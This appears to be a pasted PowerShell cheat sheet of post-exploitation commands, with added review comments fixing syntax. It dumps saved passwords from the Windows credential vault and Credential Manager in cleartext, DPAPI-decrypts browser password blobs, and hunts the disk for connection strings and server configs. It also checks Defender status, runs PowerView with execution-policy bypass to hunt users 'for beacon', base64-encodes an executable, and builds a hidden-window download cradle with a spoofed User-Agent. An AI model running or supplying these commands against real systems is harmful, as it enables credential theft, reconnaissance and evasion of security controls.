opexxx

Powershell4infosec.txt

Oct 21st, 2020 (edited)
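  # Install modules (Install-Module pulls from the configured PowerShell Gallery
# repository; review/pin what gets installed, as with any third-party dependency)
Install-Module AADInternals
Install-Module -Name CredentialManager
Install-Module -Name BetterCredentials

# Import the module
Import-Module AADInternals

Install-Module -Name AzureAD
Install-Module MSOnline

# Prompt prediction: PSReadLine prerelease + the Az predictor plugin
Install-Module PSReadline -AllowPrerelease
Install-Module -Name Az.Tools.Predictor
Import-Module Az.Tools.Predictor
Set-PSReadLineOption -PredictionSource HistoryAndPlugin
Set-PSReadLineOption -PredictionViewStyle ListView

#####
# For every AD site object (one level under CN=Sites in the Configuration NC) print
# the site name and the ACEs (identity + rights) on the object.
# The paste had "$($.Name)" and "AD:\$" -- the automatic variable $_ with the
# underscore stripped -- restored here; the AD: path uses the DN explicitly.
# Replace DC=domain,DC=com with the forest's configuration naming context.
Get-ADObject -Filter * -SearchBase "CN=Sites,CN=Configuration,DC=domain,DC=com" -SearchScope OneLevel |
  ForEach-Object {
    "Site Name: $($_.Name)"
    (Get-Acl "AD:\$($_.DistinguishedName)").Access | Select-Object IdentityReference, ActiveDirectoryRights | Format-List
  }
######

# Content: Receive Credentials from IE & Edge
# Reads the current user's Web Credentials vault (WinRT PasswordVault) and prints
# username, resource and password in cleartext. Anything that records the console
# (transcription, script-block/module logging, SIEM agents) records the secrets too.
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$vault = New-Object Windows.Security.Credentials.PasswordVault
$vault.RetrieveAll() | ForEach-Object { $_.RetrievePassword(); $_ } | Select-Object username, resource, password

# Same vault dump as a single line (no property selection, full objects are emitted).
[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];(New-Object Windows.Security.Credentials.PasswordVault).RetrieveAll() | ForEach-Object { $_.RetrievePassword(); $_ }

# CredentialManager module: print each stored credential as user:password.
# The SecureString is marshalled to an unmanaged BSTR. The original never released
# it, leaving a plaintext copy in process memory; ZeroFreeBSTR in finally wipes and
# frees it. The original also split the output across the host stream (Write-Host)
# and the output stream; one formatted string per credential is emitted instead.
Get-StoredCredential | ForEach-Object {
  $p = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($_.password)
  try {
    "{0}:{1}" -f $_.username, [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($p)
  } finally {
    [System.Runtime.InteropServices.Marshal]::ZeroFreeBSTR($p)
  }
}

# Report whether Windows Defender is enabled, using the paste's rule: productState
# as a 6-digit hex string, third digit "1" means enabled.
# The paste had ""0"" (doubled quotes left over from embedding this in another
# string), which is a syntax error; fixed to "0".
# root/SecurityCenter2 exists on client SKUs only -- on Windows Server this prints nothing.
Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct | ForEach-Object {
  if ($_.displayName -eq "Windows Defender") {
    $state = [Convert]::ToString($_.productState, 16).PadLeft(6, "0")
    if ($state.Substring(2, 1) -eq "1") {
      Write-Host "Windows Defender is Enabled"
    } else {
      Write-Host "Windows Defender is Disabled"
    }
  }
}

# Full-disk search of config/conf/xml files for "connectionString" (errors such as
# access-denied are silenced). Recursing all of C:\ is slow and noisy; narrow the
# root when the target directory is known.
gci c:\ -Include *.config,*.conf,*.xml -File -Recurse -EA SilentlyContinue | Select-String -Pattern "connectionString"

# Locate well-known web/database server configuration files anywhere on C:\.
gci c:\ -Include web.config,applicationHost.config,php.ini,httpd.conf,httpd-xampp.conf,my.ini,my.cnf -File -Recurse -EA SilentlyContinue

# DPAPI-decrypt a byte[] with the current user's key and decode the result as UTF-8.
# NOTE(review): $datarow is not defined anywhere in this paste; it is expected to
# carry a password_value byte array -- confirm against whatever produces it.
[System.Text.Encoding]::UTF8.GetString([System.Security.Cryptography.ProtectedData]::Unprotect($datarow.password_value,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser))

###DLP
# Base64-encode a binary into an ASCII text file.
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Temp\file.exe")) | Out-File -Encoding ASCII C:\Temp\file.txt

# PowerView, output locally to disk for beacon:
# NOTE(review): "-no" is not an unambiguous powershell.exe switch abbreviation
# (NoLogo / NoExit / NoProfile / NonInteractive) and is probably rejected; "-nop"
# (NoProfile) was most likely intended -- confirm before relying on this line.
  powershell -no -exec bypass -command "& {Import-Module .\PowerView.ps1; Invoke-UserHunter USRNAME | Out-File -Encoding Ascii USERNAME.txt}"

# PowerView user hunting, search by keyword (Get-NetUser is a PowerView function,
# so PowerView.ps1 must already be imported in the session running these).
# The paste had "samaccountname.description" -- a "." where the property list
# separator "," belongs, which selects a non-existent property; fixed.
  powershell Get-NetUser -Filter "(description=*medical*)" | Select-Object -Prop samaccountname,description,title
  powershell Get-NetUser -Filter "(title=*medical*)" | Select-Object -Prop samaccountname,description,title

# Simple Web request: hidden window, browser-like User-Agent, goes through the
# system default proxy with the current user's network credentials.
  powershell.exe -w hidden -command $wc = New-Object System.Net.Webclient; $wc.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64;Trident/7.0; AS; rv:11.0) Like Gecko'); $wc.proxy= [System.Net.WebRequest]::DefaultWebProxy; $wc.proxy.credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; $wc.downloadstring('http://google.com/')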